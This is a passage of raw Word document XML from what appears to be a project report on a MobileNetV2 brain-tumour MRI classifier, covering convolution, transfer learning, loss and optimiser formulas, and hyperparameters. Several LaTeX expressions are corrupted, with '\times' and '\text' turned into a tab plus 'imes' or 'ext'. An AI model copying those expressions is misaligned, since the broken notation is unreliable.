        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>As you slide the tube across the puzzle, your brain remembers: *"Here is a line, here is another line, and over here they connect to form a circle!"*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>When you step back and look at all those shapes together, your brain says: *"That circle with two triangles on top is a cat's head!"*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Technical Reality</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A Convolutional Neural Network (CNN) does the exact same thing mathematically using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kernels (Filters)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Convolution Operation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A small mathematical matrix (e.g., $3 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes 3$ pixels) slides across the $224 </w:t>
        <w:tab/>
        <w:t>imes 224$ image, computing dot products between its weights and local pixel patches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Receptive Field:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Early layers have small receptive fields, detecting edges, gradients, and textures. Deeper layers combine those low-level features to recognize complex anatomical structures (e.g., ventricular symmetry, dural borders, abnormal focal hyperintensities).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Spatial Hierarchy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pooling and stride operations progressively reduce spatial dimensions while expanding channel depth, converting raw spatial pixels into rich semantic feature vectors.</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8.2 The MobileNetV2 Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Why MobileNetV2 Instead of ResNet50 or VGG16?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>In medical software development, compute efficiency is critical. Consider the architectural comparison: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20" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Metric</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VGG16</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ResNet50</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MobileNetV2 (Our Backbone)</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**Total Parameters**</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~138 Million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~25.6 Million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**~3.4 Million (Outer Head Total: 2.42M)**</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**Model Disk Size**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~528 MB</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~98 MB</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**~11.1 MB**</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**Multiply-Accumulate (MAC) Operations**</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~15.3 Billion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~3.8 Billion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**~300 Million (12x faster!)**</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**Inference Latency (CPU)**</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~450 ms</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~120 ms</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**~25 ms**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>MobileNetV2 delivers state-of-the-art feature extraction while remaining small enough to run in real time on standard hospital CPU workstations without requiring expensive, power-hungry GPUs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Secret Sauce: Depthwise Separable Convolutions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Standard convolutions perform spatial filtering and channel combining simultaneously, which is computationally expensive. MobileNetV2 splits standard convolution into two decoupled steps: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Standard Convolution ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Input: (H x W x C_in) ──[ 3x3 x C_in x C_out Filter ]──&gt; Output: (H x W x C_out)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Computational Cost: H x W x C_in x C_out x 3 x 3</w:t>
              <w:br/>
              <w:br/>
              <w:t>[ Depthwise Separable Convolution ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Step 1: Depthwise Convolution</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Applies ONE 3x3 filter per input channel independently (Spatial filtering only)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Cost: H x W x C_in x 3 x 3</w:t>
              <w:br/>
              <w:t xml:space="preserve">               │</w:t>
              <w:br/>
              <w:t xml:space="preserve">               ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Step 2: Pointwise Convolution</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Applies 1x1 convolutions across all channels to combine features (Channel mixing)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Cost: H x W x C_in x C_out x 1 x 1</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  Total Computation Reduction:</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Ratio = (Depthwise + Pointwise) / Standard ≈ 1/N + 1/K^2 ≈ 1/9 (8 to 9 Times Faster!)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Inverted Residuals &amp; Linear Bottlenecks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Traditional residual blocks (like ResNet) compress channels first, apply convolution, and then expand. MobileNetV2 inverts this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Expansion:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Expands channel depth by a factor of 6 using $1 </w:t>
        <w:tab/>
        <w:t>imes 1$ conv.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Depthwise Filtering:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Filters spatially in high-dimensional space where features are easily separable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Linear Bottleneck:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Projects back to a low-dimensional representation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a non-linear ReLU activation. (Why? Non-linearities in low dimensions destroy information manifolds; keeping the bottleneck linear preserves subtle signals).</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8.3 Transfer Learning Philosophy &amp; Frozen Base</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">We initialize MobileNetV2 with weights pre-trained on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ImageNet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1.4 million real-world images across 1,000 categories).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The "Frozen Base" Rule</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>In our architecture, we explicitly set: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base_model.trainable = False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Our custom classification head begins with completely random weights. If we backpropagated gradients through MobileNetV2 during the first epochs, huge gradient swings would destroy the pre-trained feature extractors—a phenomenon known as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Catastrophic Forgetting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>By freezing the base, MobileNetV2 acts as a rock-solid, static feature extractor, allowing our dense classification head to stabilize smoothly.</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8.4 Mathematical Formulations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. Categorical Cross-Entropy Loss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Because our problem involves four mutually exclusive classes, we optimize using Categorical Cross-Entropy:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$$\mathcal{L} = -\sum_{c=1}^{4} y_c \log(\hat{y}_c)$$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Where:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$y_c \in \{0, 1\}$ is the ground-truth one-hot label.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$\hat{y}_c \in [0.0, 1.0]$ is the predicted probability for class $c$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>If the true class is Glioma ($y_1 = 1$) and the model predicts $\hat{y}_1 = 0.95$, loss is $-\log(0.95) \approx 0.051$ (low penalty). If it predicts $\hat{y}_1 = 0.10$, loss explodes to $-\log(0.10) \approx 2.302$ (severe penalty).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. The Softmax Activation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>To convert the four raw numerical outputs (logits $z_1, z_2, z_3, z_4$) from the final Dense layer into valid probabilities that sum to $1.0$:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$$\hat{y}_c = \frac{e^{z_c}}{\sum_{j=1}^{4} e^{z_j}}$$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The exponential function $e^z$ ensures all outputs are strictly positive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The denominator normalizes the sum to exactly $1.0$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. The Adam Optimizer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">We compile the model with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Adam (Adaptive Moment Estimation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> optimizer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Adam maintains exponential moving averages of both past gradients ($m_t$, the first moment / momentum) and past squared gradients ($v_t$, the second moment / uncentered variance).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>It adapts the learning rate independently for each parameter: parameters with frequent, large gradients get smaller updates, while parameters with sparse gradients get larger updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Learning rate used: $\eta = 0.001$ (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1e-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</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8.5 Comprehensive Hyperparameters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40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hyperparameter</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Project Value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Data Type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Default in Keras</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Practical Effect of Altering</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`IMG_HEIGHT`, `IMG_WIDTH`</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 xml:space="preserve">$224 </w:t>
              <w:tab/>
              <w:t>imes 224$</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Integer</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None</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Higher (e.g. 512) captures micro-features but increases RAM &amp; compute by 4x. Lower (e.g. 112) loses tumor margin sharpness.</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`BATCH_SIZE`</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$32$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Integer</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32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Larger (64) trains faster but requires more GPU/CPU RAM. Smaller (16) introduces noisy gradient updates that can act as regularization.</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`learning_rate` (Adam)</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$0.001$ (`1e-3`)</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Float</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0.001</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If too large ($0.01$), loss diverges and weights oscillate wildly. If too small ($1</w:t>
              <w:tab/>
              <w:t>ext{e-}5$), the head requires 50+ epochs to converge.</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`Dense` units (Head)</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$128$</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Integer</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None</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More units (512) increase capacity but risk overfitting on 5,600 images. Fewer (32) create a bottleneck that underfits complex tumor features.</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`Dropout` rate 1</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$0.3$ ($30\%$)</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Float</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0.0</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Fraction of neurons randomly zeroed after GAP. Higher (0.5) increases regularization; lower (0.1) risks memorizing training scans.</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`Dropout` rate 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$0.2$ ($20\%$)</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Float</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0.0</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Secondary regularization after the 128-unit dense projection.</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`rotation_range` (Aug)</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$0.05$ (~$18^\circ$)</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Float</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0.0</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Maximum random rotation. Must be small in cranial MRI because brains are naturally aligned; extreme $90^\circ$ tilts violate anatomical plausibility.</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`zoom_range` (Aug)</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$0.05$ ($5\%$)</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Float</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0.0</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Simulates subtle scanner distance variations without cropping out peripheral meningiomas.</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`EPOCHS` (Full Model)</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$8$</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Integer</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1</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Calibrated based on empirical convergence of the 80/20 run (which reached minimum loss at Epoch 7).</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`overlay_alpha`</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$0.45$</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Float</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None</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Grad-CAM blending weight. $0.0$ shows raw MRI only; $1.0$ shows pure Jet colormap. $0.45$ yields optimal diagnostic transparency.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pP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9: Model Saving and Loading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>9.1 The Serialization Format: Native Keras v3 (`.keras`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Our production model is stored on disk at:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>d:\Brain_Tumor\models\brain_tumor_mobilenetv2_full_scratch.keras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>](file:///d:/Brain_Tumor/models/brain_tumor_mobilenetv2_full_scratch.keras) (File size: 11.1 MB).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>What Is a `.keras` File Under the Hood?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Historically, Keras saved models as monolithic HDF5 files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.h5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">). In modern Keras (v3 / TensorFlow 2.15+), the native </w:t>
